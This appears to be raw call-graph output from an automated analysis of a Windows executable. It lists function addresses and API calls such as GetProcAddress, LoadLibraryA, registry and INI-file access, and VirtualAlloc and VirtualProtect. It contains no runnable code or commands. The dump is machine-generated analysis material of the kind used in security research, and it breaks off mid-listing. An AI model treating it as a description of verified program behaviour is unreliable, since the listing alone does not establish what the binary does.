std::_Facet_Register 8 API calls 92913->92914 92915 43be6d GetCurrentProcessId PostMessageW 92914->92915 92915->92636 92916->92682 92917->92667 92918->92675 92919->92649 92920->92682 92921->92682 92922->92663 92923->92682 92924->92682 92925->92682 92926->92649 92927->92652 92928->92669 92929->92649 92930->92682 92932 451f5f ShowWindow EnableWindow 92931->92932 92934 452519 92932->92934 92935 451f8a 92932->92935 92938 41bf60 42 API calls 92934->92938 92936 452406 92935->92936 92937 451f93 92935->92937 92941 41bf60 42 API calls 92936->92941 92940 45269d InvalidateRect 92937->92940 92943 41bf60 42 API calls 92937->92943 92939 45251e 92938->92939 92942 45266f 92939->92942 92946 513ac7 std::_Facet_Register 8 API calls 92939->92946 92944 513805 _com_util::ConvertStringToBSTR 5 API calls 92940->92944 92945 45240b GetTickCount 92941->92945 92952 452691 GetTickCount 92942->92952 92953 452401 92942->92953 92947 451fa1 GetTickCount 92943->92947 92948 45126b 92944->92948 92949 45243f 92945->92949 92951 45253c SetWindowPos 92946->92951 92954 451fd3 92947->92954 93026 446140 44 API calls 3 library calls 92948->93026 92950 452501 GetTickCount 92949->92950 92955 513ac7 std::_Facet_Register 8 API calls 92949->92955 92957 452697 92950->92957 92951->92942 92966 4525cb 92951->92966 92952->92957 92953->92952 92959 408180 43 API calls 92954->92959 92958 45245a 92955->92958 92957->92940 93051 446140 44 API calls 3 library calls 92958->93051 92961 451fef 92959->92961 92962 452017 92961->92962 92963 451ff8 GetProcAddress 92961->92963 93029 446140 44 API calls 3 library calls 92962->93029 92963->92962 92964 452483 SetWindowPos 92964->92950 93052 49c5e0 28 API calls 92966->93052 92969 45202a 93030 421f00 92969->93030 92972 45203f 92973 45237e 92972->92973 92974 513ac7 std::_Facet_Register 8 API calls 92972->92974 92973->92952 92977 452398 GetSystemMenu EnableMenuItem 92973->92977 92976 452053 92974->92976 92975 4525d8 92975->92942 92980 45260c GetClientRect ClientToScreen SetCursorPos 92975->92980 92984 41bf60 42 API calls 92976->92984 93047 49c5e0 28 API calls 92977->93047 92979 4523be 92981 4523d7 92979->92981 93048 49ddf0 90 API calls 92979->93048 92980->92942 93049 49c5e0 28 API calls 92981->93049 92985 4520cf 92984->92985 92985->92973 92988 4520d9 SetWindowPos 92985->92988 92989 452104 92988->92989 92990 4521a8 92988->92990 93024->92703 93025->92699 93026->92692 93027->92693 93028->92698 93029->92969 93031 513ac7 std::_Facet_Register 8 API calls 93030->93031 93032 421f41 GetCurrentProcessId PostMessageW 93031->93032 93032->92972 93047->92979 93048->92981 93051->92964 93052->92975 93054 415dc0 43 API calls 93053->93054 93071 41ed7f shared_ptr __Getcvt 93054->93071 93055 41f5ab 93056 513805 _com_util::ConvertStringToBSTR 5 API calls 93055->93056 93057 41f5c9 93056->93057 93057->92711 93058 415dc0 43 API calls 93058->93071 93059 41ee24 GetProcAddress 93059->93071 93060 41f578 93061 415dc0 43 API calls 93060->93061 93062 41f583 93061->93062 93062->93055 93063 41f58c GetProcAddress 93062->93063 93063->93055 93064 41eeab GetProcAddress 93064->93071 93065 408050 43 API calls 93065->93071 93066 41eeee GetProcAddress 93066->93071 93067 40b650 SimpleUString::operator= 27 API calls 93067->93071 93068 40b7a0 27 API calls 93068->93071 93069 41efce GetProcAddress 93069->93071 93070 46bc20 6 API calls 93070->93071 93071->93055 93071->93058 93071->93059 93071->93060 93071->93064 93071->93065 93071->93066 93071->93067 93071->93068 93071->93069 93071->93070 93073 41f563 93071->93073 93354 46bb40 93071->93354 93073->93060 93074 41f5cf 93073->93074 93075 51b528 std::runtime_error::runtime_error 26 API calls 93074->93075 93076 41f5d4 93075->93076 93077 470690 27 API calls 93076->93077 93078 41f669 93077->93078 93079 41bf60 42 API calls 93078->93079 93080 41f675 93079->93080 93081 470880 27 API calls 93080->93081 93082 41f689 93081->93082 93083 471d90 27 API calls 93082->93083 93344 470895 93343->93344 93345 46fea0 27 API calls 93344->93345 93346 41da93 93345->93346 93346->92718 93355 46bb81 93354->93355 93356 46bb5e GetProcAddress 93354->93356 93357 513805 _com_util::ConvertStringToBSTR 5 API calls 93355->93357 93356->93355 93358 46bb93 93357->93358 93358->93071 93465 415dc0 43 API calls 93464->93465 93466 437ef5 93465->93466 93467 437f04 GetProcAddress 93466->93467 93468 437f29 93466->93468 93467->93468 93469 437ff1 93468->93469 93471 415dc0 43 API calls 93468->93471 93470 513805 _com_util::ConvertStringToBSTR 5 API calls 93469->93470 93472 438003 93470->93472 93473 437f61 93471->93473 93472->92837 93474 437f83 RegQueryValueExA 93473->93474 93475 437f6a GetProcAddress 93473->93475 93476 415dc0 43 API calls 93474->93476 93475->93474 93477 437fa8 93476->93477 93478 437fb1 GetProcAddress 93477->93478 93479 437fd0 93477->93479 93478->93479 93479->93469 93480 437fdc 93479->93480 93481 513805 _com_util::ConvertStringToBSTR 5 API calls 93480->93481 93482 437feb 93481->93482 93482->92837 93483->92842 87332 498850 87338 4a1cf0 GetPropW 87332->87338 87334 49885d 87335 49886b 87334->87335 87339 49a480 87334->87339 87338->87334 87344 49a4d6 _DebugHeapAllocator 87339->87344 87340 49a5f6 87355 49a60e GetCapture 87340->87355 87387 49a960 87340->87387 87341 49ab10 _DebugHeapAllocator 87345 49afb8 87341->87345 87346 49ac72 87341->87346 87342 49a9c7 SendMessageW 87447 49aa37 87342->87447 87343 49a583 RtlEnterCriticalSection 87347 49a5b3 87343->87347 87348 49a5e4 RtlLeaveCriticalSection 87343->87348 87344->87340 87344->87343 87344->87387 87547 5139d3 5 API calls __Init_thread_wait 87344->87547 87353 49b180 87345->87353 87354 49afc3 87345->87354 87351 49ac78 87346->87351 87352 49af94 87346->87352 87504 513ac7 87347->87504 87348->87340 87350 49b6be 87350->87343 87358 49b6ce RtlInitializeCriticalSection 87350->87358 87365 49acd8 87351->87365 87366 49ae7c 87351->87366 87367 49ad1c 87351->87367 87368 49acbc 87351->87368 87369 49af40 RemovePropW 87351->87369 87370 49af12 InvalidateRect 87351->87370 87371 49ac94 87351->87371 87372 49ae07 ScreenToClient 87351->87372 87409 49ad54 87351->87409 87413 49ae93 87351->87413 87417 49a732 shared_ptr 87351->87417 87422 49acb7 _DebugHeapAllocator shared_ptr 87351->87422 87352->87422 87539 49a1c0 115 API calls _DebugHeapAllocator 87352->87539 87373 49b568 __Getcvt 87353->87373 87374 49b491 __Getcvt 87353->87374 87353->87422 87430 49b404 _DebugHeapAllocator 87353->87430 87359 49b079 __Getcvt 87354->87359 87360 49afc9 87354->87360 87355->87387 87408 49a61d _DebugHeapAllocator 87355->87408 87357 49a5ba 87362 49a5cb 87357->87362 87363 49a5d6 87357->87363 87548 513d5f 29 API calls __onexit 87358->87548 87377 49b08c GetClassNameW lstrcmpiW 87359->87377 87385 49afd9 87360->87385 87415 49afe5 87360->87415 87360->87422 87511 46be60 8 API calls _com_util::ConvertStringToBSTR 87362->87511 87363->87348 87379 49aceb BeginPaint 87365->87379 87380 49acdc 87365->87380 87537 4a2e20 6 API calls 2 library calls 87366->87537 87536 4a2b20 8 API calls 2 library calls 87367->87536 87535 498890 121 API calls 2 library calls 87368->87535 87407 49af71 87369->87407 87370->87422 87376 49aca0 87371->87376 87533 499ac0 115 API calls 2 library calls 87371->87533 87388 49ae3a 87372->87388 87389 49ae61 SendMessageW 87372->87389 87393 49b57b GetClassNameW lstrcmpiW 87373->87393 87404 49b4a4 GetClassNameW lstrcmpiW 87374->87404 87534 498890 121 API calls 2 library calls 87376->87534 87395 49b0ba SetFocus 87377->87395 87431 49b0c3 _DebugHeapAllocator 87377->87431 87455 4996e0 87379->87455 87396 4996e0 28 API calls 87380->87396 87382 49add7 LoadCursorW SetCursor 87382->87417 87384 49b6e3 87549 513989 RtlEnterCriticalSection RtlLeaveCriticalSection SetEvent ResetEvent 87384->87549 87540 4993b0 66 API calls 2 library calls 87385->87540 87386 49a71e CallWindowProcW 87386->87417 87387->87341 87387->87342 87388->87389 87388->87422 87389->87422 87391 49a5d2 87391->87363 87405 49b5a9 SetFocus 87393->87405 87434 49b5b2 _DebugHeapAllocator 87393->87434 87395->87431 87396->87417 87397 49a635 _DebugHeapAllocator 87397->87386 87397->87417 87412 49b4d2 SetFocus 87404->87412 87437 49b4db _DebugHeapAllocator 87404->87437 87405->87434 87487 496970 87407->87487 87408->87397 87433 49a703 87408->87433 87409->87382 87429 49ad8b 87409->87429 87410 49b6ed 87410->87343 87411 49887d 87412->87437 87413->87386 87484 4992f0 87413->87484 87419 49b031 KillTimer 87415->87419 87415->87422 87513 513805 87417->87513 87418 49b13f lstrcmpiW 87421 49b159 87418->87421 87418->87422 87419->87422 87421->87422 87542 49a1c0 115 API calls _DebugHeapAllocator 87421->87542 87422->87417 87546 4a1cf0 GetPropW 87422->87546 87424 49aee4 73A0A570 87426 4996e0 28 API calls 87424->87426 87425 49af06 87538 4a3010 GetPropW SetWindowRgn 87425->87538 87426->87422 87429->87417 87435 49ada8 LoadCursorW SetCursor 87429->87435 87430->87422 87432 49b477 87430->87432 87431->87418 87438 49b12a 87431->87438 87543 49cce0 53 API calls _com_util::ConvertStringToBSTR 87432->87543 87512 49cce0 53 API calls _com_util::ConvertStringToBSTR 87433->87512 87434->87421 87441 49b625 87434->87441 87435->87417 87437->87421 87440 49b54e 87437->87440 87541 49cce0 53 API calls _com_util::ConvertStringToBSTR 87438->87541 87439 49b48c 87439->87422 87544 49cce0 53 API calls _com_util::ConvertStringToBSTR 87440->87544 87545 49cce0 53 API calls _com_util::ConvertStringToBSTR 87441->87545 87446 49b563 87446->87421 87447->87341 87449 49ab15 _DebugHeapAllocator 87447->87449 87520 49dc10 87447->87520 87449->87341 87450 49ab84 87449->87450 87452 49ab91 _DebugHeapAllocator 87449->87452 87531 49cce0 53 API calls _com_util::ConvertStringToBSTR 87450->87531 87452->87341 87453 49abe9 87452->87453 87532 49cce0 53 API calls _com_util::ConvertStringToBSTR 87453->87532 87456 49970e _DebugHeapAllocator 87455->87456 87457 499aa5 87456->87457 87459 499743 GetClientRect 87456->87459 87460 499735 DeleteObject 87456->87460 87458 513805 _com_util::ConvertStringToBSTR 5 API calls 87457->87458 87461 499ab1 EndPaint 87458->87461 87462 499758 87459->87462 87460->87459 87461->87417 87463 499799 SelectObject 87462->87463 87481 4997b2 _DebugHeapAllocator 87463->87481 87464 49992a 87465 49993b IsWindow 87464->87465 87467 499a64 87464->87467 87466 49994c 87465->87466 87465->87467 87466->87467 87468 499962 GetWindowRect 87466->87468 87469 499a90 SelectObject DeleteDC 87467->87469 87470 499993 87468->87470 87469->87457 87471 4999e9 HideCaret 87470->87471 87472 4999c2 IsWindow 87470->87472 87474 4999f2 UpdateLayeredWindow 87471->87474 87472->87471 87473 4999c9 87472->87473 87473->87471 87478 4999db KillTimer 87473->87478 87475 499a59 ShowCaret 87474->87475 87476 499a29 IsWindow 87474->87476 87475->87469 87476->87475 87477 499a30 87476->87477 87477->87475 87479 499a42 GetCaretBlinkTime SetTimer 87477->87479 87478->87474 87479->87469 87480 49dc10 7 API calls 87480->87481 87481->87464 87481->87480 87482 499875 CreateRectRgn SelectClipRgn SetViewportOrgEx 87481->87482 87483 4998d2 SetViewportOrgEx SelectClipRgn DeleteObject 87482->87483 87483->87481 87485 4992fa IsWindow 87484->87485 87486 499305 87484->87486 87485->87486 87486->87424 87486->87425 87488 4969aa DeleteObject 87487->87488 87489 4969b4 87487->87489 87488->87489 87490 4969bb DeleteObject 87489->87490 87495 4969c5 87489->87495 87490->87495 87491 496a6a 87550 49bba0 87491->87550 87493 496b0a SetPropW 87494 496b21 87493->87494 87496 496b40 shared_ptr 87493->87496 87494->87496 87499 496bb7 87494->87499 87495->87491 87557 4955f0 27 API calls 3 library calls 87495->87557 87558 49c3e0 26 API calls shared_ptr 87496->87558 87498 496abd 87498->87493 87559 51b528 87499->87559 87503 496b64 shared_ptr 87503->87417 87506 513acc _com_util::ConvertStringToBSTR 87504->87506 87505 513ae6 87505->87357 87506->87505 87508 513ae8 std::_Facet_Register 87506->87508 87566 52defa 7 API calls 2 library calls 87506->87566 87567 516569 RaiseException 87508->87567 87510 514ec3 87510->87357 87511->87391 87512->87397 87514 513810 IsProcessorFeaturePresent 87513->87514 87515 51380e 87513->87515 87517 513e4d 87514->87517 87515->87411 87568 513e11 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 87517->87568 87519 513f30 87519->87411 87521 49dc30 _DebugHeapAllocator 87520->87521 87522 49dca3 87521->87522 87525 49dc3e SetRectEmpty 87521->87525 87523 513805 _com_util::ConvertStringToBSTR 5 API calls 87522->87523 87524 49dcb1 87523->87524 87524->87447 87528 49dc4c 87525->87528 87526 49dc8b 87527 513805 _com_util::ConvertStringToBSTR 5 API calls 87526->87527 87529 49dc9d 87527->87529 87528->87526 87530 49dc74 IntersectRect 87528->87530 87529->87447 87530->87528 87531->87452 87532->87341 87533->87376 87534->87422 87535->87422 87536->87422 87537->87422 87538->87422 87539->87422 87540->87422 87541->87418 87542->87422 87543->87439 87544->87446 87545->87446 87546->87397 87547->87350 87548->87384 87549->87410 87551 49bc1c 87550->87551 87553 49bbb3 shared_ptr 87550->87553 87551->87498 87552 49bba0 26 API calls 87552->87553 87553->87551 87553->87552 87554 49bc23 87553->87554 87555 51b528 std::runtime_error::runtime_error 26 API calls 87554->87555 87556 49bc28 87555->87556 87557->87495 87558->87503 87564 51b49d 26 API calls 4 library calls 87559->87564 87561 51b537 87565 51b545 11 API calls _Atexit 87561->87565 87563 51b544 87564->87561 87565->87563 87566->87506 87567->87510 87568->87519 93556 490690 93557 513ac7 std::_Facet_Register 8 API calls 93556->93557 93558 4906a5 93557->93558 93559 4906b3 93558->93559 93598 49f040 27 API calls 93558->93598 93584 49f670 93559->93584 93563 490735 74A5E3D0 93565 513ac7 std::_Facet_Register 8 API calls 93563->93565 93564 4906f1 RtlEnterCriticalSection 93566 49072a RtlLeaveCriticalSection 93564->93566 93567 490706 93564->93567 93569 490743 93565->93569 93566->93563 93570 513ac7 std::_Facet_Register 8 API calls 93567->93570 93578 490760 93569->93578 93600 4905a0 8 API calls std::_Facet_Register 93569->93600 93573 49070d 93570->93573 93571 490795 93571->93564 93574 4907a5 RtlInitializeCriticalSection 93571->93574 93575 49071f 93573->93575 93576 490714 93573->93576 93602 513d5f 29 API calls __onexit 93574->93602 93575->93566 93599 46be60 8 API calls _com_util::ConvertStringToBSTR 93576->93599 93580 4907ba 93603 513989 RtlEnterCriticalSection RtlLeaveCriticalSection SetEvent ResetEvent 93580->93603 93581 49071b 93581->93575 93583 4907c4 93583->93564 93585 5165e0 __Getcvt 93584->93585 93586 49f6b6 GetModuleFileNameW LoadTypeLib 93585->93586 93587 49f88e 93586->93587 93588 49f6f2 shared_ptr 93586->93588 93589 513805 _com_util::ConvertStringToBSTR 5 API calls 93587->93589 93588->93587 93591 40b650 SimpleUString::operator= 27 API calls 93588->93591 93593 49f829 SysFreeString 93588->93593 93595 49f8b8 93588->93595 93604 49e6e0 27 API calls _Yarn 93588->93604 93605 49e7e0 27 API calls 93588->93605 93590 4906c4 93589->93590 93590->93563 93590->93564 93601 5139d3 5 API calls __Init_thread_wait 93590->93601 93591->93588 93593->93588 93596 51b528 std::runtime_error::runtime_error 26 API calls 93595->93596 93597 49f8bd 93596->93597 93598->93559 93599->93581 93600->93578 93601->93571 93602->93580 93603->93583 93604->93588 93605->93588 91252 4dc650 91253 4dc659 91252->91253 91254 4dc6a2 91252->91254 91261 4f32e0 91253->91261 91256 4dc666 91271 4f3190 GetModuleHandleA 91256->91271 91258 4dc67b 91258->91254 91259 4dc687 GetProcAddress 91258->91259 91259->91254 91260 4dc697 91259->91260 91260->91254 91262 4f3419 91261->91262 91265 4f3306 __Getcvt 91261->91265 91263 513805 _com_util::ConvertStringToBSTR 5 API calls 91262->91263 91264 4f3425 91263->91264 91264->91256 91266 4f33a8 VerSetConditionMask VerSetConditionMask VerSetConditionMask VerSetConditionMask 91265->91266 91267 4f33dc VerSetConditionMask 91266->91267 91268 4f33e4 VerifyVersionInfoA 91266->91268 91267->91268 91269 513805 _com_util::ConvertStringToBSTR 5 API calls 91268->91269 91270 4f3415 91269->91270 91270->91256 91272 4f31ab 91271->91272 91273 4f31b0 GetProcAddress 91271->91273 91272->91258 91288 52c155 91273->91288 91276 4f31fc 91279 4f3225 GetSystemDirectoryA 91276->91279 91280 4f3200 GetProcAddress 91276->91280 91277 4f31d8 91278 4f31ec LoadLibraryA 91277->91278 91283 4f31dc 91277->91283 91278->91258 91282 4f323c 91279->91282 91287 4f32b4 91279->91287 91280->91279 91281 4f3212 LoadLibraryExA 91280->91281 91281->91258 91282->91282 91284 4f325f GetSystemDirectoryA 91282->91284 91282->91287 91283->91258 91285 4f326d 91284->91285 91284->91287 91286 4f32bd LoadLibraryA 91285->91286 91285->91287 91286->91287 91287->91258 91291 52c16c 91288->91291 91290 4f31d1 91290->91276 91290->91277 91298 51c415 91291->91298 91294 52c18c _strpbrk 91294->91290 91296 52c1b3 91307 51b518 26 API calls std::runtime_error::runtime_error 91296->91307 91299 51c432 91298->91299 91300 51c428 91298->91300 91299->91300 91301 534703 __Toupper 38 API calls 91299->91301 91300->91294 91306 51ea9c 20 API calls _free 91300->91306 91302 51c453 91301->91302 91308 534b9f 38 API calls __Toupper 91302->91308 91304 51c46c 91309 534bcc 38 API calls __cftof 91304->91309 91306->91296 91307->91294 91308->91304 91309->91300 92377 401620 92378 40171e 92377->92378 92381 5198bd 92378->92381 92380 40172c 92384 51983e 92381->92384 92383 5198da 92383->92380 92385 519861 92384->92385 92386 51984d 92384->92386 92391 51985d __alldvrm 92385->92391 92394 533155 11 API calls 2 library calls 92385->92394 92392 51ea9c 20 API calls _free 92386->92392 92389 519852 92393 51b518 26 API calls std::runtime_error::runtime_error 92389->92393 92391->92383 92392->92389 92393->92391 92394->92391 93643 41bb20 93644 41bc80 93643->93644 93645 41bb58 93643->93645 93646 41bbb3 RtlEnterCriticalSection 93645->93646 93664 5139d3 5 API calls __Init_thread_wait 93645->93664 93647 41bc5b RtlLeaveCriticalSection 93646->93647 93648 41bbdd 93646->93648 93650 513ac7 std::_Facet_Register 8 API calls 93648->93650 93652 41bbe7 __Getcvt 93650->93652 93651 41bb77 93651->93646 93653 41bb83 RtlInitializeCriticalSection 93651->93653 93667 4821d0 RtlInitializeCriticalSection CreateEventW 93652->93667 93665 513d5f 29 API calls __onexit 93653->93665 93655 41bb9f 93666 513989 RtlEnterCriticalSection RtlLeaveCriticalSection SetEvent ResetEvent 93655->93666 93658 41bbb0 93658->93646 93659 41bc14 93660 470690 27 API calls 93659->93660 93661 41bc3d 93660->93661 93662 470690 27 API calls 93661->93662 93663 41bc4e 93662->93663 93663->93647 93664->93651 93665->93655 93666->93658 93667->93659 89721 4231e0 89722 5165e0 __Getcvt 89721->89722 89723 423223 GetModuleHandleW 89722->89723 89724 413a40 43 API calls 89723->89724 89725 423235 89724->89725 89726 423264 _strrchr 89725->89726 89727 42323e GetProcAddress 89725->89727 89728 4232cb 89726->89728 89729 4232b3 89726->89729 89735 40b8f0 numpunct 27 API calls 89726->89735 89727->89726 89730 4232c7 89728->89730 89764 4234b0 89729->89764 89730->89728 89734 4232e7 __Getcvt 89730->89734 89881 4238c0 75 API calls 2 library calls 89730->89881 89733 4232bb 89733->89728 89880 4238c0 75 API calls 2 library calls 89733->89880 89737 4232fa GetModuleHandleW 89734->89737 89735->89729 89738 413a40 43 API calls 89737->89738 89739 42330c 89738->89739 89740 423315 GetProcAddress 89739->89740 89741 42333b 89739->89741 89740->89741 89742 40b8f0 numpunct 27 API calls 89741->89742 89743 423399 89742->89743 89825 485ee0 89743->89825 89745 4233ac 89746 4233ea GetLastError 89745->89746 89747 4233e0 shared_ptr 89745->89747 89749 4234a1 89745->89749 89842 486180 89746->89842 89747->89746 89751 51b528 std::runtime_error::runtime_error 26 API calls 89749->89751 89754 4234a6 89751->89754 89755 51b528 std::runtime_error::runtime_error 26 API calls 89754->89755 89758 4234ab 89755->89758 89765 4234da 89764->89765 89766 4238a9 89764->89766 89882 408050 89765->89882 89768 513805 _com_util::ConvertStringToBSTR 5 API calls 89766->89768 89770 4238b9 89768->89770 89769 4234df 89771 423510 StrRChrIA 89769->89771 89772 4234ee GetProcAddress 89769->89772 89770->89733 89773 408050 43 API calls 89771->89773 89772->89771 89774 423529 89773->89774 89775 423534 GetProcAddress 89774->89775 89776 42355c 89774->89776 89775->89776 89777 408050 43 API calls 89776->89777 89778 42357f 89777->89778 89779 4235b2 89778->89779 89780 42358a GetProcAddress 89778->89780 89781 408050 43 API calls 89779->89781 89780->89779 89782 4235cb 89781->89782 89783 4235d6 GetProcAddress 89782->89783 89785 4235fe 89782->89785 89783->89785 89784 423881 89784->89766 89787 423885 89784->89787 89785->89784 89786 423633 89785->89786 89785->89787 89789 408050 43 API calls 89786->89789 89788 513805 _com_util::ConvertStringToBSTR 5 API calls 89787->89788 89790 4238a3 89788->89790 89791 423638 89789->89791 89790->89733 89792 423663 89791->89792 89793 423641 GetProcAddress 89791->89793 89794 408050 43 API calls 89792->89794 89793->89792 89795 423680 89794->89795 89796 423691 GetProcAddress 89795->89796 89797 4236b9 89795->89797 89796->89797 89797->89766 89798 408050 43 API calls 89797->89798 89799 4236e4 89798->89799 89826 485eed 89825->89826 89827 485f07 GetFileAttributesA 89826->89827 89828 486062 89827->89828 89829 485f17 89827->89829 89830 513805 _com_util::ConvertStringToBSTR 5 API calls 89828->89830 89829->89828 89831 485f1f CreateFileA 89829->89831 89832 486070 89830->89832 89834 48604a 89831->89834 89839 485f48 __Getcvt 89831->89839 89832->89745 89835 513805 _com_util::ConvertStringToBSTR 5 API calls 89834->89835 89836 48605e 89835->89836 89836->89745 89837 485fb0 ReadFile 89838 485ff4 CloseHandle 89837->89838 89837->89839 89840 486010 __Getcvt 89838->89840 89839->89837 89839->89838 89840->89840 89841 40b8f0 numpunct 27 API calls 89840->89841 89841->89834 89843 4861af __Getcvt 89842->89843 89844 413a40 43 API calls 89843->89844 89845 4861cd 89844->89845 89846 4861d6 GetProcAddress 89845->89846 89847 4861fc 89845->89847 89846->89847 89905 486350 89847->89905 89849 48622b GetFileVersionInfoSizeA 89880->89730 89881->89734 89883 408163 89882->89883 89884 408087 89882->89884 89883->89769 89885 4080e2 RtlEnterCriticalSection 89884->89885 89902 5139d3 5 API calls __Init_thread_wait 89884->89902 89886 40810c 89885->89886 89887 40813f RtlLeaveCriticalSection 89885->89887 89889 513ac7 std::_Facet_Register 8 API calls 89886->89889 89887->89769 89893 408113 __Getcvt 89889->89893 89890 4080a6 89890->89885 89891 4080b2 RtlInitializeCriticalSection 89890->89891 89903 513d5f 29 API calls __onexit 89891->89903 89899 46d750 LoadLibraryA 89893->89899 89894 4080ce 89904 513989 RtlEnterCriticalSection RtlLeaveCriticalSection SetEvent ResetEvent 89894->89904 89898 4080df 89898->89885 89900 513805 _com_util::ConvertStringToBSTR 5 API calls 89899->89900 89901 408130 89900->89901 89901->89887 89902->89890 89903->89894 89904->89898 89906 48639b 89905->89906 89907 486477 89905->89907 89908 4863f6 RtlEnterCriticalSection 89906->89908 89928 5139d3 5 API calls __Init_thread_wait 89906->89928 89907->89849 87569 51f0f2 87570 51f0fe __fread_nolock 87569->87570 87571 51f10c 87570->87571 87573 51f139 87570->87573 87594 51ea9c 20 API calls _free 87571->87594 87575 51f14b 87573->87575 87576 51f13e 87573->87576 87574 51f111 87595 51b518 26 API calls std::runtime_error::runtime_error 87574->87595 87586 533d08 87575->87586 87596 51ea9c 20 API calls _free 87576->87596 87580 51f154 87581 51f168 87580->87581 87582 51f15b 87580->87582 87598 51f19c RtlLeaveCriticalSection __fread_nolock 87581->87598 87597 51ea9c 20 API calls _free 87582->87597 87583 51f11c __fread_nolock 87587 533d14 __fread_nolock 87586->87587 87599 52d216 RtlEnterCriticalSection 87587->87599 87589 533d22 87600 533da2 87589->87600 87593 533d53 __fread_nolock 87593->87580 87594->87574 87595->87583 87596->87583 87597->87583 87598->87583 87599->87589 87607 533dc5 87600->87607 87601 533e1e 87618 534966 87601->87618 87606 533e30 87612 533d2f 87606->87612 87631 533212 11 API calls 2 library calls 87606->87631 87607->87601 87607->87607 87607->87612 87616 51a65e RtlEnterCriticalSection 87607->87616 87617 51a672 RtlLeaveCriticalSection 87607->87617 87609 533e4f 87632 51a65e RtlEnterCriticalSection 87609->87632 87613 533d5e 87612->87613 87636 52d25e RtlLeaveCriticalSection 87613->87636 87615 533d65 87615->87593 87616->87607 87617->87607 87623 534973 __Toupper 87618->87623 87619 5349b3 87634 51ea9c 20 API calls _free 87619->87634 87620 53499e RtlAllocateHeap 87621 533e27 87620->87621 87620->87623 87625 5335af 87621->87625 87623->87619 87623->87620 87633 52defa 7 API calls 2 library calls 87623->87633 87626 5335ba RtlFreeHeap 87625->87626 87630 5335e3 _free 87625->87630 87627 5335cf 87626->87627 87626->87630 87635 51ea9c 20 API calls _free 87627->87635 87629 5335d5 GetLastError 87629->87630 87630->87606 87631->87609 87632->87612 87633->87623 87634->87621 87635->87629 87636->87615 92398 4886e0 92399 48871b __Getcvt 92398->92399 92400 408180 43 API calls 92399->92400 92401 488723 92400->92401 92402 488732 GetProcAddress 92401->92402 92405 488755 __Getcvt 92401->92405 92402->92405 92403 488a0b 92404 513805 _com_util::ConvertStringToBSTR 5 API calls 92403->92404 92406 488a1c 92404->92406 92405->92403 92407 51ac8c 26 API calls 92405->92407 92408 48879d 92407->92408 92409 51ac8c 26 API calls 92408->92409 92410 4887b6 GetLocalTime 92409->92410 92434 456830 92410->92434 92413 408050 43 API calls 92414 488808 92413->92414 92415 488811 GetProcAddress 92414->92415 92416 488826 PathFileExistsA 92414->92416 92415->92416 92417 488989 CreateFileA 92416->92417 92418 488840 SetFileAttributesA GetPrivateProfileStringA 92416->92418 92417->92403 92420 4889a7 CloseHandle 92417->92420 92419 488883 92418->92419 92421 4889b5 WritePrivateProfileStringA WritePrivateProfileStringA 92419->92421 92424 4888b7 GetPrivateProfileIntA GetPrivateProfileIntA 92419->92424 92420->92421 92422 4889f3 WritePrivateProfileStringA 92421->92422 92422->92403 92425 4888fb 92424->92425 92437 488de0 51 API calls 92425->92437 92427 48890d WritePrivateProfileStringA 92428 48893d WritePrivateProfileStringA 92427->92428 92429 488963 WritePrivateProfileStringA 92427->92429 92430 513805 _com_util::ConvertStringToBSTR 5 API calls 92428->92430 92431 513805 _com_util::ConvertStringToBSTR 5 API calls 92429->92431 92432 48895c 92430->92432 92433 488982 92431->92433 92435 417c40 51 API calls 92434->92435 92436 45684c 92435->92436 92436->92413 92437->92427 90391 46f5ac GetCurrentThreadId 90394 46f5e3 90391->90394 90402 46f5d9 shared_ptr 90391->90402 90392 513805 _com_util::ConvertStringToBSTR 5 API calls 90393 46f8de 90392->90393 90394->90402 90408 46f16b 90394->90408 90397 46f16b VirtualQuery 90398 46f62c 90397->90398 90399 513ac7 std::_Facet_Register 8 API calls 90398->90399 90398->90402 90400 46f64f 90399->90400 90414 46f004 90400->90414 90402->90392 90403 46f6c2 SetLastError 90405 46f660 __Getcvt 90403->90405 90404 46f791 _Yarn 90404->90402 90406 46f83d VirtualProtect 90404->90406 90405->90402 90405->90403 90405->90404 90406->90402 90407 46f85a GetLastError 90406->90407 90407->90402 90409 46f172 90408->90409 90410 46f1b4 90408->90410 90412 46f188 90409->90412 90422 46ebc4 VirtualQuery _Atexit 90409->90422 90410->90397 90412->90410 90423 46ebc4 VirtualQuery _Atexit 90412->90423 90415 46f038 90414->90415 90419 46f0e1 __Getcvt 90415->90419 90424 46ef5b 90415->90424 90418 46f0d2 90431 46eeb5 7 API calls _com_util::ConvertStringToBSTR 90418->90431 90419->90405 90421 46f0db 90421->90419 90422->90412 90423->90410 90425 46ef84 90424->90425 90426 46eff3 90425->90426 90427 46ef99 VirtualQuery 90425->90427 90430 46efc3 VirtualAlloc 90425->90430 90428 513805 _com_util::ConvertStringToBSTR 5 API calls 90426->90428 90427->90425 90427->90426 90429 46f002 90428->90429 90429->90418 90429->90419 90430->90425 90430->90426 90431->90421 92438 51aefc 92441 51af19 92438->92441 92440 51af14 92443 51af25 __fread_nolock 92441->92443 92442 51af5d __fread_nolock 92442->92440 92443->92442 92444 51af65 92443->92444 92445 51af38 __Getcvt 92443->92445 92454 51a65e RtlEnterCriticalSection 92444->92454 92468 51ea9c 20 API calls _free 92445->92468 92447 51af6f 92455 51ad30 92447->92455 92449 51af52 92469 51b518 26 API calls std::runtime_error::runtime_error 92449->92469 92454->92447 92459 51ad42 __Getcvt 92455->92459 92461 51ad5f 92455->92461 92456 51ad4f 92536 51ea9c 20 API calls _free 92456->92536 92458 51ad54 92537 51b518 26 API calls std::runtime_error::runtime_error 92458->92537 92459->92456 92459->92461 92463 51ada2 __fread_nolock 92459->92463 92470 51afa4 RtlLeaveCriticalSection __fread_nolock 92461->92470 92462 51aebe __Getcvt 92539 51ea9c 20 API calls _free 92462->92539 92463->92461 92463->92462 92465 5335e9 __fread_nolock 26 API calls 92463->92465 92471 5312b2 92463->92471 92538 51afac 26 API calls 4 library calls 92463->92538 92465->92463 92468->92449 92469->92442 92470->92442 92472 5312c4 92471->92472 92473 5312dc 92471->92473 92549 51ea89 20 API calls _free 92472->92549 92474 531646 92473->92474 92480 531321 92473->92480 92571 51ea89 20 API calls _free 92474->92571 92476 5312c9 92550 51ea9c 20 API calls _free 92476->92550 92479 53164b 92572 51ea9c 20 API calls _free 92479->92572 92481 5312d1 92480->92481 92483 53132c 92480->92483 92489 53135c 92480->92489 92481->92463 92551 51ea89 20 API calls _free 92483->92551 92484 531339 92573 51b518 26 API calls std::runtime_error::runtime_error 92484->92573 92486 531331 92552 51ea9c 20 API calls _free 92486->92552 92490 